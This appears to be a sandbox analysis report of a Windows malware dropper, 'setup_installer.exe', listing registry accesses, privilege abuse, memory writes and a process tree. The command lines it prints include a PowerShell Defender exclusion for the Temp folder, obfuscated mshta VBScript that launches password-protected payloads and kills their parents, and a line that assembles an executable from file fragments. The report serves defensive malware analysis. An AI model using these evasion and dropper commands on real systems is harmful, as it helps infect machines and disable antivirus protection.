Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS0BB86396\Fri2050293ea5.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS0BB86396\Fri20d5530575e8aa3ed.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS0BB86396\Fri20c0c46650eeb2a.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\is-QR0BN.tmp\Fri20d5530575e8aa3ed.tmp N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS0BB86396\setup_install.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS0BB86396\Fri2060ea1c5d8fae8aa.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\mshta.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS0BB86396\Fri20fbc038b0b02ea.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS0BB86396\Fri20d5530575e8aa3ed.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS0BB86396\Fri209d5bfbb2.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS0BB86396\Fri2002ce5f91c761.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS0BB86396\Fri20ba391d4469.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\setup_installer.exe N/A

Kills process with taskkill

evasion
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeCreateTokenPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS0BB86396\Fri2060ea1c5d8fae8aa.exe N/A
Token: SeAssignPrimaryTokenPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS0BB86396\Fri2060ea1c5d8fae8aa.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS0BB86396\Fri2060ea1c5d8fae8aa.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS0BB86396\Fri2060ea1c5d8fae8aa.exe N/A
Token: SeMachineAccountPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS0BB86396\Fri2060ea1c5d8fae8aa.exe N/A
Token: SeTcbPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS0BB86396\Fri2060ea1c5d8fae8aa.exe N/A
Token: SeSecurityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS0BB86396\Fri2060ea1c5d8fae8aa.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS0BB86396\Fri2060ea1c5d8fae8aa.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS0BB86396\Fri2060ea1c5d8fae8aa.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS0BB86396\Fri2060ea1c5d8fae8aa.exe N/A
Token: SeSystemtimePrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS0BB86396\Fri2060ea1c5d8fae8aa.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS0BB86396\Fri2060ea1c5d8fae8aa.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS0BB86396\Fri2060ea1c5d8fae8aa.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS0BB86396\Fri2060ea1c5d8fae8aa.exe N/A
Token: SeCreatePermanentPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS0BB86396\Fri2060ea1c5d8fae8aa.exe N/A
Token: SeBackupPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS0BB86396\Fri2060ea1c5d8fae8aa.exe N/A
Token: SeRestorePrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS0BB86396\Fri2060ea1c5d8fae8aa.exe N/A
Token: SeShutdownPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS0BB86396\Fri2060ea1c5d8fae8aa.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS0BB86396\Fri2060ea1c5d8fae8aa.exe N/A
Token: SeAuditPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS0BB86396\Fri2060ea1c5d8fae8aa.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS0BB86396\Fri2060ea1c5d8fae8aa.exe N/A
Token: SeChangeNotifyPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS0BB86396\Fri2060ea1c5d8fae8aa.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS0BB86396\Fri2060ea1c5d8fae8aa.exe N/A
Token: SeUndockPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS0BB86396\Fri2060ea1c5d8fae8aa.exe N/A
Token: SeSyncAgentPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS0BB86396\Fri2060ea1c5d8fae8aa.exe N/A
Token: SeEnableDelegationPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS0BB86396\Fri2060ea1c5d8fae8aa.exe N/A
Token: SeManageVolumePrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS0BB86396\Fri2060ea1c5d8fae8aa.exe N/A
Token: SeImpersonatePrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS0BB86396\Fri2060ea1c5d8fae8aa.exe N/A
Token: SeCreateGlobalPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS0BB86396\Fri2060ea1c5d8fae8aa.exe N/A
Token: 31 N/A C:\Users\Admin\AppData\Local\Temp\7zS0BB86396\Fri2060ea1c5d8fae8aa.exe N/A
Token: 32 N/A C:\Users\Admin\AppData\Local\Temp\7zS0BB86396\Fri2060ea1c5d8fae8aa.exe N/A
Token: 33 N/A C:\Users\Admin\AppData\Local\Temp\7zS0BB86396\Fri2060ea1c5d8fae8aa.exe N/A
Token: 34 N/A C:\Users\Admin\AppData\Local\Temp\7zS0BB86396\Fri2060ea1c5d8fae8aa.exe N/A
Token: 35 N/A C:\Users\Admin\AppData\Local\Temp\7zS0BB86396\Fri2060ea1c5d8fae8aa.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS0BB86396\Fri20e095683c2b3a0c.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2992 wrote to memory of 2280 N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe C:\Users\Admin\AppData\Local\Temp\7zS0BB86396\setup_install.exe
PID 2992 wrote to memory of 2280 N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe C:\Users\Admin\AppData\Local\Temp\7zS0BB86396\setup_install.exe
PID 2992 wrote to memory of 2280 N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe C:\Users\Admin\AppData\Local\Temp\7zS0BB86396\setup_install.exe
PID 2992 wrote to memory of 2280 N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe C:\Users\Admin\AppData\Local\Temp\7zS0BB86396\setup_install.exe
PID 2992 wrote to memory of 2280 N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe C:\Users\Admin\AppData\Local\Temp\7zS0BB86396\setup_install.exe
PID 2992 wrote to memory of 2280 N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe C:\Users\Admin\AppData\Local\Temp\7zS0BB86396\setup_install.exe
PID 2992 wrote to memory of 2280 N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe C:\Users\Admin\AppData\Local\Temp\7zS0BB86396\setup_install.exe
PID 2280 wrote to memory of 2580 N/A C:\Users\Admin\AppData\Local\Temp\7zS0BB86396\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2280 wrote to memory of 2580 N/A C:\Users\Admin\AppData\Local\Temp\7zS0BB86396\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2280 wrote to memory of 2580 N/A C:\Users\Admin\AppData\Local\Temp\7zS0BB86396\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2280 wrote to memory of 2580 N/A C:\Users\Admin\AppData\Local\Temp\7zS0BB86396\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2280 wrote to memory of 2580 N/A C:\Users\Admin\AppData\Local\Temp\7zS0BB86396\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2280 wrote to memory of 2580 N/A C:\Users\Admin\AppData\Local\Temp\7zS0BB86396\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2280 wrote to memory of 2580 N/A C:\Users\Admin\AppData\Local\Temp\7zS0BB86396\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2580 wrote to memory of 2688 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2580 wrote to memory of 2688 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2580 wrote to memory of 2688 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2580 wrote to memory of 2688 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2580 wrote to memory of 2688 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2580 wrote to memory of 2688 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2580 wrote to memory of 2688 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2280 wrote to memory of 2608 N/A C:\Users\Admin\AppData\Local\Temp\7zS0BB86396\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2280 wrote to memory of 2608 N/A C:\Users\Admin\AppData\Local\Temp\7zS0BB86396\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2280 wrote to memory of 2608 N/A C:\Users\Admin\AppData\Local\Temp\7zS0BB86396\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2280 wrote to memory of 2608 N/A C:\Users\Admin\AppData\Local\Temp\7zS0BB86396\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2280 wrote to memory of 2608 N/A C:\Users\Admin\AppData\Local\Temp\7zS0BB86396\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2280 wrote to memory of 2608 N/A C:\Users\Admin\AppData\Local\Temp\7zS0BB86396\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2280 wrote to memory of 2608 N/A C:\Users\Admin\AppData\Local\Temp\7zS0BB86396\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2280 wrote to memory of 2200 N/A C:\Users\Admin\AppData\Local\Temp\7zS0BB86396\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2280 wrote to memory of 2200 N/A C:\Users\Admin\AppData\Local\Temp\7zS0BB86396\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2280 wrote to memory of 2200 N/A C:\Users\Admin\AppData\Local\Temp\7zS0BB86396\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2280 wrote to memory of 2200 N/A C:\Users\Admin\AppData\Local\Temp\7zS0BB86396\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2280 wrote to memory of 2200 N/A C:\Users\Admin\AppData\Local\Temp\7zS0BB86396\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2280 wrote to memory of 2200 N/A C:\Users\Admin\AppData\Local\Temp\7zS0BB86396\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2280 wrote to memory of 2200 N/A C:\Users\Admin\AppData\Local\Temp\7zS0BB86396\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2280 wrote to memory of 2784 N/A C:\Users\Admin\AppData\Local\Temp\7zS0BB86396\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2280 wrote to memory of 2784 N/A C:\Users\Admin\AppData\Local\Temp\7zS0BB86396\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2280 wrote to memory of 2784 N/A C:\Users\Admin\AppData\Local\Temp\7zS0BB86396\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2280 wrote to memory of 2784 N/A C:\Users\Admin\AppData\Local\Temp\7zS0BB86396\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2280 wrote to memory of 2784 N/A C:\Users\Admin\AppData\Local\Temp\7zS0BB86396\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2280 wrote to memory of 2784 N/A C:\Users\Admin\AppData\Local\Temp\7zS0BB86396\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2280 wrote to memory of 2784 N/A C:\Users\Admin\AppData\Local\Temp\7zS0BB86396\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2280 wrote to memory of 2556 N/A C:\Users\Admin\AppData\Local\Temp\7zS0BB86396\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2280 wrote to memory of 2556 N/A C:\Users\Admin\AppData\Local\Temp\7zS0BB86396\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2280 wrote to memory of 2556 N/A C:\Users\Admin\AppData\Local\Temp\7zS0BB86396\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2280 wrote to memory of 2556 N/A C:\Users\Admin\AppData\Local\Temp\7zS0BB86396\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2280 wrote to memory of 2556 N/A C:\Users\Admin\AppData\Local\Temp\7zS0BB86396\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2280 wrote to memory of 2556 N/A C:\Users\Admin\AppData\Local\Temp\7zS0BB86396\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2280 wrote to memory of 2556 N/A C:\Users\Admin\AppData\Local\Temp\7zS0BB86396\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2280 wrote to memory of 2568 N/A C:\Users\Admin\AppData\Local\Temp\7zS0BB86396\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2280 wrote to memory of 2568 N/A C:\Users\Admin\AppData\Local\Temp\7zS0BB86396\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2280 wrote to memory of 2568 N/A C:\Users\Admin\AppData\Local\Temp\7zS0BB86396\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2280 wrote to memory of 2568 N/A C:\Users\Admin\AppData\Local\Temp\7zS0BB86396\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2280 wrote to memory of 2568 N/A C:\Users\Admin\AppData\Local\Temp\7zS0BB86396\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2280 wrote to memory of 2568 N/A C:\Users\Admin\AppData\Local\Temp\7zS0BB86396\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2280 wrote to memory of 2568 N/A C:\Users\Admin\AppData\Local\Temp\7zS0BB86396\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2280 wrote to memory of 2584 N/A C:\Users\Admin\AppData\Local\Temp\7zS0BB86396\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2280 wrote to memory of 2584 N/A C:\Users\Admin\AppData\Local\Temp\7zS0BB86396\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2280 wrote to memory of 2584 N/A C:\Users\Admin\AppData\Local\Temp\7zS0BB86396\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2280 wrote to memory of 2584 N/A C:\Users\Admin\AppData\Local\Temp\7zS0BB86396\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2280 wrote to memory of 2584 N/A C:\Users\Admin\AppData\Local\Temp\7zS0BB86396\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2280 wrote to memory of 2584 N/A C:\Users\Admin\AppData\Local\Temp\7zS0BB86396\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2280 wrote to memory of 2584 N/A C:\Users\Admin\AppData\Local\Temp\7zS0BB86396\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2280 wrote to memory of 2628 N/A C:\Users\Admin\AppData\Local\Temp\7zS0BB86396\setup_install.exe C:\Windows\SysWOW64\cmd.exe

Processes

C:\Users\Admin\AppData\Local\Temp\setup_installer.exe

"C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"

C:\Users\Admin\AppData\Local\Temp\7zS0BB86396\setup_install.exe

"C:\Users\Admin\AppData\Local\Temp\7zS0BB86396\setup_install.exe"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Fri20109b9e174d0fc.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Fri20ee0a6fe195bd09.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Fri200ae385720d3.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Fri2050293ea5.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Fri209f6924af86d795.exe /mixone

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Fri20ba391d4469.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Fri20d5530575e8aa3ed.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Fri2002ce5f91c761.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Fri20c0c46650eeb2a.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Fri209c4b463b.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Fri208f5f140853548.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Fri20fbc038b0b02ea.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Fri20e095683c2b3a0c.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Fri209d5bfbb2.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Fri2060ea1c5d8fae8aa.exe

C:\Users\Admin\AppData\Local\Temp\7zS0BB86396\Fri2002ce5f91c761.exe

Fri2002ce5f91c761.exe

C:\Users\Admin\AppData\Local\Temp\7zS0BB86396\Fri209f6924af86d795.exe

Fri209f6924af86d795.exe /mixone

C:\Users\Admin\AppData\Local\Temp\7zS0BB86396\Fri208f5f140853548.exe

Fri208f5f140853548.exe

C:\Users\Admin\AppData\Local\Temp\7zS0BB86396\Fri20e095683c2b3a0c.exe

Fri20e095683c2b3a0c.exe

C:\Users\Admin\AppData\Local\Temp\7zS0BB86396\Fri20109b9e174d0fc.exe

Fri20109b9e174d0fc.exe

C:\Users\Admin\AppData\Local\Temp\7zS0BB86396\Fri20fbc038b0b02ea.exe

Fri20fbc038b0b02ea.exe

C:\Users\Admin\AppData\Local\Temp\7zS0BB86396\Fri20c0c46650eeb2a.exe

Fri20c0c46650eeb2a.exe

C:\Users\Admin\AppData\Local\Temp\7zS0BB86396\Fri20d5530575e8aa3ed.exe

Fri20d5530575e8aa3ed.exe

C:\Users\Admin\AppData\Local\Temp\7zS0BB86396\Fri200ae385720d3.exe

Fri200ae385720d3.exe

C:\Users\Admin\AppData\Local\Temp\7zS0BB86396\Fri2060ea1c5d8fae8aa.exe

Fri2060ea1c5d8fae8aa.exe

C:\Users\Admin\AppData\Local\Temp\7zS0BB86396\Fri2050293ea5.exe

Fri2050293ea5.exe

C:\Users\Admin\AppData\Local\Temp\7zS0BB86396\Fri20ee0a6fe195bd09.exe

Fri20ee0a6fe195bd09.exe

C:\Windows\SysWOW64\mshta.exe

"C:\Windows\System32\mshta.exe" VbsCRiPT: cLosE (CrEaTeOBJeCt ( "WScrIPT.SheLL" ).RuN ( "CMD.exe /c copy /y ""C:\Users\Admin\AppData\Local\Temp\7zS0BB86396\Fri208f5f140853548.exe"" 09xU.exE && STarT 09xU.EXE -pPtzyIkqLZoCarb5ew & If """" =="""" for %U iN ( ""C:\Users\Admin\AppData\Local\Temp\7zS0BB86396\Fri208f5f140853548.exe"" ) do taskkill /F -Im ""%~NxU"" " , 0 , tRUe) )

C:\Users\Admin\AppData\Local\Temp\7zS0BB86396\Fri209d5bfbb2.exe

Fri209d5bfbb2.exe

C:\Users\Admin\AppData\Local\Temp\7zS0BB86396\Fri20ba391d4469.exe

Fri20ba391d4469.exe

C:\Users\Admin\AppData\Local\Temp\is-QR0BN.tmp\Fri20d5530575e8aa3ed.tmp

"C:\Users\Admin\AppData\Local\Temp\is-QR0BN.tmp\Fri20d5530575e8aa3ed.tmp" /SL5="$701B2,140785,56832,C:\Users\Admin\AppData\Local\Temp\7zS0BB86396\Fri20d5530575e8aa3ed.exe"

C:\Windows\SysWOW64\mshta.exe

"C:\Windows\System32\mshta.exe" vBSCript: CLose ( CrEAteOBjeCT ( "wsCrIPt.SHell"). RUN ( "CmD /Q /c TYPe ""C:\Users\Admin\AppData\Local\Temp\7zS0BB86396\Fri20ba391d4469.exe"" > EUUIXyGKjuAj.exe && STart EUUIXYgKJuAJ.EXE /pkrs9YKWRf3sVprfXBE2vA2Yg3 & IF """" == """" for %A iN ( ""C:\Users\Admin\AppData\Local\Temp\7zS0BB86396\Fri20ba391d4469.exe"" ) do taskkill /f /IM ""%~NxA"" " , 0 , true ) )

C:\Users\Admin\AppData\Local\Temp\7zS0BB86396\Fri20d5530575e8aa3ed.exe

"C:\Users\Admin\AppData\Local\Temp\7zS0BB86396\Fri20d5530575e8aa3ed.exe" /SILENT

C:\Users\Admin\AppData\Local\Temp\is-P6ABI.tmp\Fri20d5530575e8aa3ed.tmp

"C:\Users\Admin\AppData\Local\Temp\is-P6ABI.tmp\Fri20d5530575e8aa3ed.tmp" /SL5="$801B2,140785,56832,C:\Users\Admin\AppData\Local\Temp\7zS0BB86396\Fri20d5530575e8aa3ed.exe" /SILENT

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2228 -s 272

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /c copy /y "C:\Users\Admin\AppData\Local\Temp\7zS0BB86396\Fri208f5f140853548.exe" 09xU.exE && STarT 09xU.EXE -pPtzyIkqLZoCarb5ew & If "" =="" for %U iN ( "C:\Users\Admin\AppData\Local\Temp\7zS0BB86396\Fri208f5f140853548.exe" ) do taskkill /F -Im "%~NxU"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /Q /c TYPe "C:\Users\Admin\AppData\Local\Temp\7zS0BB86396\Fri20ba391d4469.exe" > EUUIXyGKjuAj.exe && STart EUUIXYgKJuAJ.EXE /pkrs9YKWRf3sVprfXBE2vA2Yg3 & IF "" == "" for %A iN ( "C:\Users\Admin\AppData\Local\Temp\7zS0BB86396\Fri20ba391d4469.exe" ) do taskkill /f /IM "%~NxA"

C:\Users\Admin\AppData\Local\Temp\09xU.exE

09xU.EXE -pPtzyIkqLZoCarb5ew

C:\Windows\SysWOW64\taskkill.exe

taskkill /F -Im "Fri208f5f140853548.exe"

C:\Windows\SysWOW64\mshta.exe

"C:\Windows\System32\mshta.exe" VbsCRiPT: cLosE (CrEaTeOBJeCt ( "WScrIPT.SheLL" ).RuN ( "CMD.exe /c copy /y ""C:\Users\Admin\AppData\Local\Temp\09xU.exE"" 09xU.exE && STarT 09xU.EXE -pPtzyIkqLZoCarb5ew & If ""-pPtzyIkqLZoCarb5ew "" =="""" for %U iN ( ""C:\Users\Admin\AppData\Local\Temp\09xU.exE"" ) do taskkill /F -Im ""%~NxU"" " , 0 , tRUe) )

C:\Users\Admin\AppData\Local\Temp\EUUIXyGKjuAj.exe

EUUIXYgKJuAJ.EXE /pkrs9YKWRf3sVprfXBE2vA2Yg3

C:\Windows\SysWOW64\taskkill.exe

taskkill /f /IM "Fri20ba391d4469.exe"

C:\Windows\SysWOW64\mshta.exe

"C:\Windows\System32\mshta.exe" vBSCript: CLose ( CrEAteOBjeCT ( "wsCrIPt.SHell"). RUN ( "CmD /Q /c TYPe ""C:\Users\Admin\AppData\Local\Temp\EUUIXyGKjuAj.exe"" > EUUIXyGKjuAj.exe && STart EUUIXYgKJuAJ.EXE /pkrs9YKWRf3sVprfXBE2vA2Yg3 & IF ""/pkrs9YKWRf3sVprfXBE2vA2Yg3 "" == """" for %A iN ( ""C:\Users\Admin\AppData\Local\Temp\EUUIXyGKjuAj.exe"" ) do taskkill /f /IM ""%~NxA"" " , 0 , true ) )

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /c copy /y "C:\Users\Admin\AppData\Local\Temp\09xU.exE" 09xU.exE && STarT 09xU.EXE -pPtzyIkqLZoCarb5ew & If "-pPtzyIkqLZoCarb5ew " =="" for %U iN ( "C:\Users\Admin\AppData\Local\Temp\09xU.exE" ) do taskkill /F -Im "%~NxU"

C:\Windows\SysWOW64\mshta.exe

"C:\Windows\System32\mshta.exe" vbScRipT: cloSE ( creAteobjECT ( "WscriPT.SHell" ). RuN ( "cMd.exE /Q /r eCHO | SET /P = ""MZ"" > ScMeAP.SU & CoPY /b /Y ScMeAp.SU + 20L2VNO.2 + gUVIl5.SCH + 7TCInEJp.0 + yKIfDQA.1 r6f7sE.I & StART control .\R6f7sE.I " , 0 ,TRuE ) )

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /Q /c TYPe "C:\Users\Admin\AppData\Local\Temp\EUUIXyGKjuAj.exe" > EUUIXyGKjuAj.exe && STart EUUIXYgKJuAJ.EXE /pkrs9YKWRf3sVprfXBE2vA2Yg3 & IF "/pkrs9YKWRf3sVprfXBE2vA2Yg3 " == "" for %A iN ( "C:\Users\Admin\AppData\Local\Temp\EUUIXyGKjuAj.exe" ) do taskkill /f /IM "%~NxA"

C:\Users\Admin\AppData\Local\Temp\7zS0BB86396\Fri20fbc038b0b02ea.exe

